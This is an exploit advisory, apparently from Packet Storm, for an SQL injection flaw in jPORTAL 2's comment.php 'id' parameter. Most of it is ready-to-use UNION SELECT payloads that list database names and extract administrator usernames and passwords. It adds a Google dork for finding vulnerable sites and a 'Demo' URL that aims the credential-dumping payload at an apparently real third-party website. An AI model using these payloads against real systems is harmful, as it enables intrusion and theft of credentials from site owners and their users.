jPORTAL 2 SQL Injection

2012-01-01T00:00:00
ID PACKETSTORM:108285
Type packetstorm
Reporter Farbod Mahini
Modified 2012-01-01T00:00:00

Description

                                        
                                            `############################################################################  
# Exploit Title: jPORTAL 2 SQL Injection Vulnerabilitiy   
# Google Dork: "powered by jPORTAL 2"   
# Date: 8/12/2011  
# Author: H4ckCity Security Team  
# Discovered By: farbodmahini  
# Home: WwW.H4ckCity.Org   
# Software Link: http://jportal2.com/  
# Version: All Version  
# Security Risk::High  
# Tested on: GNU/Linux Ubuntu - Windows Server  
############################################################################  
# Exploit:  
#   
# http://target.com/comment.php?what=news&id=[sqli]  
#  
# For get The DB:  
#  
# http://target.com/comment.phpwhat=news&id=999 union all select null,null,(select distinct   
# concat(unhex(Hex(cast(schema_name as char)))) from `information_schema`.schemata limit   
# 1,1),null,null,null,null,null,null--  
#  
# For get The Username & Password :  
#  
# http://target.com/comment.phpwhat=news&id=999 union all select null,null,(select concat  
# (unhex(Hex(cast(admins.nick as char))),0x3a,unhex(Hex(cast(admins.pass as char)))) from   
# `target_database`.admins Order by nick limit 0,1) ,null,null,null,null,null,null--   
#   
# Demo:  
#  
# http://www.lotnisko.szprotawa.org.pl/comment.php?what=news&id=3 union all   
# select null,null,(select concat(unhex(Hex(cast(admins.nick as char))),0x3a,unhex(Hex(cast  
# (admins.pass as char)))) from `tmnet_lotnisko`.admins Order by nick limit 0,1)   
# ,null,null,null,null,null,null--  
#  
############################################################################  
# Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R-   
# nitrojen90-hellboy-K0242-kingcope-Mr.M4st3r , ...  
############################################################################  
GreetZ : All H4ckCity Member  
############################################################################  
`